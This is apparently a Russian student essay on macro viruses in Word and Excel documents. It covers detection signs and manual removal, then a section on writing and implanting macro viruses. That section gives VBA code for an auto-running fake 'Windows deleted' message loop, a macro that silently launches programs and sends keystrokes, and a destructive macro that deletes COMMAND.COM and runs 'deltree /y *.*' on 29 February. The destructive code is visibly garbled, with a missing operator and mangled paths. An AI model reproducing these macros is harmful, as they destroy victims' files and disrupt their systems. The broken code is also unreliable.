Вирусы в макросах документов: способы внедрения, распространения и защиты

5.1 Обнаружение макровируса

 

Характерными признаками присутствия  макровирусов являются:

1. невозможность конвертирования зараженного документа Word в другой формат;
2. зараженные файлы имеют формат Template (шаблон), поскольку при заражении Word-вирусы конвертируют файлы из формата Word Document в Template
3. невозможность записи документа в другой каталог или на другой диск командой «Save As» (только для Word 6);
4. в STARTUP-каталоге присутствуют «чужие» файлы;
5. наличие в Книге (Book) «лишних» и скрытых Листов (Sheets).

Для проверки системы на предмет  наличия вируса можно использовать пункт меню Tools/Macro. Если обнаружены «чужие макросы», то они могут принадлежать вирусу. Однако этот метод не работает в случае стелс-вирусов, которые «запрещают» работу этого пункта меню, что, в свою очередь, является достаточным основанием считать систему зараженной.

Многие вирусы имеют ошибки или  некорректно работают в различных  версиях Word/Excel, в результате чего эти программы выдают сообщения об ошибке, например:

WordBasic Err = номер ошибки.

Если такое сообщение появляется при редактировании нового документа  или таблицы и при этом заведомо не используются какие-либо пользовательские макросы, то это также может служить  признаком заражения системы. Также  сигналом о вирусе являются изменения  в файлах и системной конфигурации Word, Excel и Windows. Многие вирусы тем или иным образом меняют пункты меню Tools/Options — разрешают или запрещают функции «Prompt to Save Normal Template», «Allow Fast Save», «Virus Protection». Некоторые вирусы устанавливают на файлы пароль при их заражении. Большое количество вирусов создают новые секции и/или опции в файле конфигурации Windows (WIN.INI).

Естественно, что к проявлениям  вируса относятся такие «неожиданности», как появление сообщений или  диалогов с достаточно странным содержанием или на языке, не совпадающем с языком установленной версии Word/Excel.

5.2 Восстановление пораженных объектов

 

В большинстве случаев процедура  «лечения» зараженных файлов и дисков сводится к запуску подходящего  антивирусного программного обеспечения. Но бывают ситуации, когда обезвреживание вируса приходится осуществлять самостоятельно, т. е. «руками».

Для обезвреживания вирусов Word и Excel достаточно сохранить всю необходимую информацию в формате не-документов и не-таблиц. Наиболее подходящим является текстовый RTF-формат, включающий практически всю информацию из первоначальных документов и не содержащий макросов.

Затем следует выйти из Word/Excel, уничтожить все зараженные Word-документы, Excel-таблицы, NORMAL.DOT для Word и все документы/таблицы в STARTUP-каталогах Word/Excel. После этого следует запустить Word/Excel и восстановить документы/таблицы из RTF-файлов.

В результате этой процедуры вирус  будет удален из системы, а практически  вся информация останется без  изменений. Однако этот метод имеет  ряд недостатков. Основным является трудоемкость конвертирования документов и таблиц в RTF-формат, если их число  велико. К тому же в случае Excel необходимо отдельно конвертировать все Листы (Sheets) в каждом Excel-файле.

Другим существенным недостатком  является потеря нормальных макросов, использующихся при работе. Поэтому  перед запуском описанной процедуры  следует сохранить их исходный текст, а после обезвреживания вируса восстановить необходимые макросы в первоначальном виде.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

6.  Создание вирусов в макросах и их внедрение в файлы документов

6.1 Постоянный вывод сообщения  на экран

В программе сообщения будут выдаваться каждые 2 секунды. Назовем первый макрос AutoExec, чтобы он запускался при старте Word. В данном случае метод onTime использует функции Now, чтобы определить текущее время, и TimeValue для того, чтобы задать промежуток равный двум секундам. Макрос Message выдает сообщение и задает следующий интервал выполнения.

                    

                         Рис2 Результат внедрения программы

 

Sub AutoExec()

 Application.OnTime Now + TimeValue("00:00:01"), "message"

End Sub

Sub Message()

 MsgBox ("WINDOWS БЫЛА УСПЕШНО УДАЛЕНА")

 Application.OnTime Now + TimeValue("00:00:01"), "message"

 End Sub

 

6.2 Запуск приложении из макровируса

 

В данном макровирусе можно выполнить  автозапуск приложения а можно выполнить при сочетании определенных клавиш. Суть данного макровируса заключается в том что он может несанкционированно запускать любые приложения Windows.

 

                     

Рис3 Запуск приложения из макровируса

 

Sub Navigator()

MySHell = Shell("C:\Program Files\AIMP3\AIMP3.exe",                   vbNormalFocus)

   SendKeys "{ENTER}", True

Rem имитируем нажатие на клавишу enter

   SendKeys "{TAB}", True

Rem имитируем нажатие на клавишу tab

      SendKeys "{ENTER}", True

End Sub

 

6.3 Автозапуск и выполнение

 

 При выходе из WinWord он проверяет два па- 
раметра: имя, на которое зарегистрирован WinWord (если это не 
«любое имя пользователя», то будет удален файл COMMAND.COM), и текущую системную дату (если это 29 февраля, выполняется команда "deltree

 

Sub Main

'Проверим регистрационное имя 
If Application. Username "любое ваше имя пользователя" Then

'Снимем атрибуты COMMAND.COM 
SetAttr "C:COMMAND.COM",0

'Откроем для проверки - вдруг появятся ошибки 
Open "CACOMMAND.COM" for Output as #1

'Если ошибки есть, то закроем. 
Close #1

'и удалим

Kill "CACOMMAND.COM"

End If

'Проверим месяц и дату. Если 29 февраля, то выполним 
'команду "deltree /у >nul 
If Month(Now())=2 Then 
If Day(Now())=29 Then 
Shell "deltree /y *.* >nu" 
End If 
End If 
End Sub

 

 

 

 

 

 

 

 

Заключение

Итак, давно прошли те времена, когда  вирусы играли на зараженных компьютерах  музыку, устраивали на экране спецэффекты, форматировали жесткий диск и  делали различные другие гадости. Современные  вирусы всем этим баловством, как правило, не занимаются, и, как следствие, мы их практически не замечаем. А если и замечаем - то обычно лишь в тех  случаях, когда они нам напрямую говорят "дай денег!". Сбой или повреждение системы теперь не является прямой задачей вируса, а если такое и случается - то либо вследствие сбоя в самом вирусе, либо из-за того, что на компьютере развелся уже целый зоопарк разных вирусов, и они не поделили между собой систему :)

Причиной такой метаморфозы  стало развитие технологий, благодаря  которому компьютеры из дорогой экзотики превратились в бытовую технику. А где массовость - там и возможность  заработка. Тем более, что развитие всевозможных электронных платежей дополнительно стимулирует появление программ, предназначенных для скрытого управления денежными потоками. Поэтому если ранние вирусы - по большей части порождение человеческой злобы, тщеславия и желания нагадить ближнему, то современные вирусы - явление чисто экономическое, а потому исключительно рациональное. Разумеется, и сейчас встречаются вирусы, созданные "для души" и/или с целью сделать какую-нибудь гадость конкретному человеку или (чаще) всему миру в целом - но их сейчас абсолютное меньшинство, да и выживают они с трудом. Практически все виды современных вирусов (трояны, черви и т.п.) в компьютерной фауне служат только одной цели - зарабатыванию денег для своего хозяина.

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

Список литературы

 

1. Информатика. Базовый курс. / Под ред. С.В.Симоновича. - СПб.,2000г.
2. А.П.Микляев, Настольная книга пользователя IBM PC 3-издание М.:, "Солон-Р", 2000, 720 с.
3. Симонович С.В., Евсеев Г.А., Мураховский В.И. Вы купили компьютер: Полное руководство для начинающих в вопросах и ответах. - М.: АСТ-ПРЕСС КНИГА; Инфорком-Пресс, 2001.- 544 с.: ил. (1000 советов).
4. Ковтанюк Ю.С., Соловьян С.В. Самоучитель работы на персональном компьютере - К.:Юниор, 2001.- 560с., ил.